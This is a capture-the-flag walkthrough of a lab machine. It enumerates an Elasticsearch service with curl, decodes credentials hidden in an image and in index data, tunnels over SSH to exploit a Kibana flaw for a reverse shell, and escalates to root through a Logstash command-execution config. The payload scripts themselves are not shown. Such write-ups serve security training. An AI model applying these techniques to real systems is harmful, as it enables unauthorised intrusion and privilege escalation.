The site on regular HTTP port 80 is very bare, only giving us a picture and nothing else:
The site on HTTP 9200 has more going on. It is an elasticsearch service version 6.4.2:
So the picture is a clue that we’ll be looking up something in the search database. Hence the picture of a “needle”, which is what a search query is sometimes called.
It’s possible this version of elasticsearch has an exploit out there. There is one I found but it is about the “console” plugin and it doesn’t appear to work here… CVE-2018-17246.
REST API
I didn’t know anything about elasticsearch before this box, so I’ll write out things as I learn them and hope it all goes well. The port 9200 is used for elasticsearch’s REST API, so we’ll need to learn how to use it from elasticsearch’s documentation.
When trying to use a typical query POST request, I get an error stating that the server doesn’t support POST.
And that’s because I wasn’t using it correctly, since I didn’t know what I was doing.
Here’s a request that returns something.
And here is the formatted JSON:
Using curl -XGET "10.10.10.115:9200/bank/" will show the format of the “bank” index. And we can do the same for “.kibana”, which might be a little more interesting. But honestly, I didn’t see anything in either which was really useful unless you’re a spammer just collecting email addresses. If we knew what ALL the indexes are, then maybe we could find something better.
Use curl -XGET "10.10.10.115:9200/_cat/indices?v" to find out what the indexes are:
And you can get the structure of them all by using curl -XGET "10.10.10.115:9200/*/" .
After playing with submitting queries, my favorite way to submit them is on the URI like… curl -XGET "10.10.10.115:9200/bank/_search/?pretty=true&q=web*" … where the “q=” is the search string.
While searching around in the data, I found this bit of encouragement to know I’m on the right track:
After a while of trying different searches like curl -XGET “10.10.10.115:9200/_search?pretty=true&q=needle” and getting nowhere fast, I decided to reassess where I was at in the challenge. Normally when I’m stuck that’s because I’m overlooking something that I should have paid closer attention to. Along with the help of a hint from a forum post that said the picture wasn’t actually useless, I was able to find another clue.
I downloaded the image of the needle from the port 80 website, and ran a “file” check on it to see if anything odd stood out.
Nothing out of the ordinary there, so then I printed out the data with “cat”, hoping there might be a hidden string in the padding at the end of the file. That’s a pretty common stegonography trick with JPEG files. Sure enough there was! It was a base64 encoded string. So I extracted it and decoded it:
Google Translate tells me this is Spanish for:
the needle in the haystack is "key"
Great! We can query elasticsearch for that and hopefully get somewhere…
My first query was for “key”, but that only returned a couple bank accounts that weren’t helpful. So then I searched for “clave” and got two hits that looked good:
“Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk=” which has a base64 string that decodes to “pass: spanish.is.key”.
And “Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg ” which has another base64 string that decodes to “user: security”.
Bingo! This should be the login to the SSH server.
SSH
Getting into the SSH with our found credentials gives access to the user flag
Looking at the process list shows that there are some processes running under the users “kibana” and “elasticsearch”. There was an exploit found early in the recon phase that affects kibana for our version on this box, it just wasn’t usable for the first stage.
Earlier when we tried to attack kibana it said we were barking up the wrong tree…
…but if the same query is used against the local interface for kibana, we get a different kind of result:
…suggesting we may be able to use the exploit afterall.
At first I tried to run the exploit code from within the ssh session, but got no results. Then I looked at the forum for just a page or two and there were several hints that seemed to suggest setting up an SSH tunnel to access the 5601 port remotely. So I read up on some tutorials for SSH Tunneling since it is kinda confusing. I got the tunnel built with ssh -L 5601:localhost:5601 security@10.10.10.115 and proved the connection worked by sending one of the previous commands from my box:
At that point we can even open the Kibana app in the browser.
But what we really want is to run the exploit and get a reverse shell.
The above screenshot shows a tunnel connection where I created the payload file “shellb.js”, and it shows the exploit command being sent to my tunneled port, and finally it shows the reverse connected shell on the left =).
The kibana payload file:
One caveat about the exploit though, if the reverse shell breaks, you may need to rename the payload file before sending the exploit again.
Set up the PTY for the shell once you are in (makes things a little easier)…
I like to make the prompt better, but that’s just me…
Also, while playing with the prompt I goofed on a command and saw something interesting…
Lol, Spanish sure is key!
Anyway, we can search for files we have access to with find / -group kibana . You’ll notice that we have access to configuration files to something called “logstash” as well. Logstash is another piece of software from elasticsearch, but this one collects and processes input instead of output like kibana.
There were a few files that seemed interesting:
It looks like there could be command injection (type == “execute”) in the output.conf and filter.conf codes.
I read some basic info pages on the config files and I believe how it works is as follows: Our data is defined by the input{} block and given certain attributes such as its type. The data is then processed by the filter{} block. Within the filter block, the grok{} routine uses a special parser called Grok to extract symbolic meaning out of the general text string, in this case “comando”. The results of the filter{} processing is piped to the output{} block for sending to the operating system through files, stdout, or in our case, shell execution.
According to the stat_interval setting, the file input should be read every 10 seconds and executed if it grew in size.
Discovering new files and checking whether they have grown/or shrunk occurs in a loop. This loop will sleep for stat_interval seconds before looping again. However, if files have grown, the new content is read and lines are enqueued. Reading and enqueuing across all grown files can take time, especially if the pipeline is congested. So the overall loop time is a combination of the stat_interval and the file read time.
Creating a file “/opt/kibana/logstash_a” should fit the input{} block of the config file.
Writing “Ejecutar comando: echo test” should fit the grok filter{} block. This can be tested with the Grok Debugger in the Web App we have access to now.
Looking at the process list we can see the logstash process is running as root, so if we it can connect out to a reverse shell, we’ll get root!
There’s multiple ways to do it, but creating a python script for the reverse shell and calling the script with the Grok command should work. My reverse shell script:
And the Grok command to send:
And it’ll take a little while for the logstash routine to run the payload, but it does eventually work!
From there, just grab the root flag and this box is done!!